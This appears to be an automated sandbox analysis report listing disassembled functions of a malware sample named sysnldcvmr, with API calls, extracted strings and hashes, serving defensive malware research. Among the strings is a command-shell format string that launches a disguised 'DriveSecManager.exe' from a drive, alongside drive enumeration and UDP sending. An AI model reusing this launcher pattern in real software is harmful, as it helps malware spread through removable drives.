                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                    • Opcode ID: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                                                                    • Instruction ID: d9bf12878483276118e69e011fb1eaaed98ea0d23904e8601ea4f62f39df24ad
                                                                                                                    • Opcode Fuzzy Hash: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                                                                    • Instruction Fuzzy Hash: C4412D74A0020ADFCB04DF95C884FAFBBB5BF49304F108969E915A7390D778AD81CB95
                                                                                                                    Function 0040E0E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                    • String ID: service$serviceType
                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                    • Opcode ID: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                                                                    • Instruction ID: 8be64e74ab35422ce5b67f5b255e261f781d2e412f5a45cda6e842047ddde31e
                                                                                                                    • Opcode Fuzzy Hash: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                                                                    • Instruction Fuzzy Hash: BB41E874A0020ADFCB14CF99C884BAFB7B9BF48304F1085ADE515A7390D778AA81CF95
                                                                                                                    Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3168844106-0
                                                                                                                    • Opcode ID: d030d70e23b1ee81df40ddde676cc41bbc8b28927f5a1e966705551878972145
                                                                                                                    • Instruction ID: 16d4c05c25790a512fd8f3a1e6e85bd280fefa1845e4e3e4af960acff63a7a98
                                                                                                                    • Opcode Fuzzy Hash: d030d70e23b1ee81df40ddde676cc41bbc8b28927f5a1e966705551878972145
                                                                                                                    • Instruction Fuzzy Hash: DE31D1722012059FC310AFB5FD8CAD7B7A8FF44324F04863EE559D3280D778A4449BA9
                                                                                                                    Function 0040E281 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                    • String ID: device$deviceType
                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                    • Opcode ID: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                                                                    • Instruction ID: b41677b7307b510c0c46b42eeb4edde7184acd44519d028b9e49cf38c7e22350
                                                                                                                    • Opcode Fuzzy Hash: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                                                                    • Instruction Fuzzy Hash: 24310C74A0020ADFCB14DF95C884FAFBBB5BF88304F108969E915B7390D778A981CB95
                                                                                                                    Function 0040E121 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                    • String ID: service$serviceType
                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                    • Opcode ID: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                                                                    • Instruction ID: ad2fb0e2655c549c540ff47f191a76fdb33d2d75a9b1b61af0e22c3c344479bd
                                                                                                                    • Opcode Fuzzy Hash: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                                                                    • Instruction Fuzzy Hash: 7B31CD74E0020ADBCB14CFD5D884BAFB7B9BF88304F1085A9E515A7390D7789A41CF95
                                                                                                                    Function 00407440 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                                                    • String ID: %s%s
                                                                                                                    • API String ID: 1447977647-3252725368
                                                                                                                    • Opcode ID: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
                                                                                                                    • Instruction ID: 516f793b53608c34cc4cf2fa152c24c34b7f811ac1bf05daad4eae6c0a67dd49
                                                                                                                    • Opcode Fuzzy Hash: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
                                                                                                                    • Instruction Fuzzy Hash: DB31FAB0D00218ABCB50DFA9D8887DDBBB4FB08305F1085AAE519B6291D7795AC4CF5A
                                                                                                                    Function 004063A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                                                                    Strings
                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 004063E7
                                                                                                                    • NoDrives, xrefs: 00406418
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                    • API String ID: 2666887985-3471754645
                                                                                                                    • Opcode ID: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                                                                    • Instruction ID: 69498c8574f0fe75ee0e18bc350880e9ca7d597cc08e8ba402afd13981da7d97
                                                                                                                    • Opcode Fuzzy Hash: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                                                                    • Instruction Fuzzy Hash: AC11DD71E4020A9BDB10CFD4D946BEEBBB4FB08708F118159E911B7280D7B85695CF99
                                                                                                                    Function 0040D160 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                                                                      • Part of subcall function 0040D250: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                                                                      • Part of subcall function 0040D250: CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2251373460-0
                                                                                                                    • Opcode ID: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                                                                    • Instruction ID: b4a3372add05cffca1b77c7dac60b50b4844df58a08520f3d20c10534500f2db
                                                                                                                    • Opcode Fuzzy Hash: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                                                                    • Instruction Fuzzy Hash: 6B31D6B4A00209EFDB04DF98D889F9EBBB5FB48304F1081A8E905A7391D775EA95CF54
                                                                                                                    Function 00407370 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep$CountTickrandsrand
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3488799664-0
                                                                                                                    • Opcode ID: c117d04b20163f9f953f828aeedb65ed40a1637f383e1ba8009b9b023e8ebc44
                                                                                                                    • Instruction ID: b6b36855a0edcd25512206b50fb5473dda965f97846ebbbd8b428d1493e324f4
                                                                                                                    • Opcode Fuzzy Hash: c117d04b20163f9f953f828aeedb65ed40a1637f383e1ba8009b9b023e8ebc44
                                                                                                                    • Instruction Fuzzy Hash: 1D21D875E04208FBD704DF60D8856AE7B31EB45304F10C47AED026B381DA79AA80DB56
                                                                                                                    Function 00408EB0 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 673498613-0
                                                                                                                    • Opcode ID: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                                                                    • Instruction ID: 40a613cc88bb75a9b4956eb5c221db2524b4544d5556699ad57a8543b44bc28a
                                                                                                                    • Opcode Fuzzy Hash: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                                                                    • Instruction Fuzzy Hash: 3B111F32510518AB8B10EF6FC44268ABBD6EF843A1B25C136FC2CDF359D634DA514BD8
                                                                                                                    Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                                                    • htons.WS2_32(?), ref: 00401281
                                                                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                    • String ID: pdu
                                                                                                                    • API String ID: 2164660128-2320407122
                                                                                                                    • Opcode ID: ad0a036109145f249a08ec8e181f2c3f15924be3383878ad7f1db0ee6fe723d0
                                                                                                                    • Instruction ID: d4e165de5104959f260b85937ca272364f863e3dc64df769d8e1baf9f078371f
                                                                                                                    • Opcode Fuzzy Hash: ad0a036109145f249a08ec8e181f2c3f15924be3383878ad7f1db0ee6fe723d0
                                                                                                                    • Instruction Fuzzy Hash: 5831A5762083009BC710DF69D884A9BBBE4AFC9714F04456EFD9897381D634D919C7E7
                                                                                                                    Function 00406460 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0040646B
                                                                                                                    • CoCreateInstance.OLE32(00412438,00000000,00000001,00412418,?), ref: 00406483
                                                                                                                    • wsprintfW.USER32 ref: 004064B6
                                                                                                                    Strings
                                                                                                                    • /c start %s & start %s\DriveSecManager.exe, xrefs: 004064AA
                                                                                                                    • %comspec%, xrefs: 004064BF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInitializeInstancewsprintf
                                                                                                                    • String ID: %comspec%$/c start %s & start %s\DriveSecManager.exe
                                                                                                                    • API String ID: 2038452267-3640840557
                                                                                                                    • Opcode ID: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                                                                    • Instruction ID: 827debbb99fb5d40cfb779b5d8ae5ab415415813199b490bc36420c15ce2df05
                                                                                                                    • Opcode Fuzzy Hash: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                                                                    • Instruction Fuzzy Hash: 0C31D875A40208BFDB04DF98D884FDEB7B5EF88704F208199F619A73A4C674AE81CB54
                                                                                                                    Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                                                      • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                      • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                      • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3966618661-0
                                                                                                                    • Opcode ID: 3b7509c36c549ccc631e3d4bc530e991b8502da243600c65769ed081249f64d8
                                                                                                                    • Instruction ID: 5b2b6301c056c53cf24b756eb28b55477e9028745ee4fe4862f5ad68d4db2f6a
                                                                                                                    • Opcode Fuzzy Hash: 3b7509c36c549ccc631e3d4bc530e991b8502da243600c65769ed081249f64d8
                                                                                                                    • Instruction Fuzzy Hash: 1841B371604A02AFC714EB39D848797F7A4BF88310F14827EE82D933D1E735A855CB99
                                                                                                                    Function 0040AB80 Relevance: 7.6, APIs: 5, Instructions: 74fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(00416478,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AC18
                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040AC39
                                                                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 0040AC43
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040AC4D
                                                                                                                    • InterlockedExchange.KERNEL32(00415260,0000003D), ref: 0040AC5A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 442028454-0
                                                                                                                    • Opcode ID: ad2f4acdc7dc609d23620ad603f7b9ac0ec9968bfa9634d541bf1612e6ff1dda
                                                                                                                    • Instruction ID: b83d763b1b95064d17473309c927232932c49c75998401e70db37280cdfd902f
                                                                                                                    • Opcode Fuzzy Hash: ad2f4acdc7dc609d23620ad603f7b9ac0ec9968bfa9634d541bf1612e6ff1dda
                                                                                                                    • Instruction Fuzzy Hash: 46318CB4E00208EFDB00CF94EC85FAEB775BB48300F218569E515A7390C774AA51CB59
                                                                                                                    Function 00408A90 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _allshl
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 435966717-0
                                                                                                                    • Opcode ID: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                                                                    • Instruction ID: 2f682f979519ea9f46037cdaf014f1fa89077d02b7b0d9f1a8f9fce332e03f2e
                                                                                                                    • Opcode Fuzzy Hash: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                                                                    • Instruction Fuzzy Hash: 62F03672A11419D79720EFFFD4424CAF7E59F88354B118676F818E3270E5709D1146F5
                                                                                                                    Function 00401330 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                                                                    • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                                                                    • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                                                                      • Part of subcall function 0040A1B0: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040A20B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                    • String ID: pdu
                                                                                                                    • API String ID: 309973729-2320407122
                                                                                                                    • Opcode ID: c39a517e5d4f3b53a3b778486be7aa7f806f5e58db1bfdeefdb0bb5bfa2d2843
                                                                                                                    • Instruction ID: 8798272c393d99dde58c69795aa0ec1d050c8eff8ee51a61ed5db2294712bea8
                                                                                                                    • Opcode Fuzzy Hash: c39a517e5d4f3b53a3b778486be7aa7f806f5e58db1bfdeefdb0bb5bfa2d2843
                                                                                                                    • Instruction Fuzzy Hash: 400186765003109BCB21AF55ECC4E9B7779AF48311B044679FD056B396C638E85487A5
                                                                                                                    Function 00406320 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D
                                                                                                                    • QueryDosDeviceW.KERNEL32(004062FF,?,00000208), ref: 0040636C
                                                                                                                    • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406384
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeviceDriveQueryType
                                                                                                                    • String ID: \??\
                                                                                                                    • API String ID: 1681518211-3047946824
                                                                                                                    • Opcode ID: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                                                                    • Instruction ID: affcc5b958b6168f9f245bae438771e9e0bc574488939cd978d138ae5b874539
                                                                                                                    • Opcode Fuzzy Hash: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                                                                    • Instruction Fuzzy Hash: 4101ECB0A4020CEBCB20DF55DD496DEB7B5AB04704F01C0BAAA09A7280D6759AD5CF99
                                                                                                                    Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON
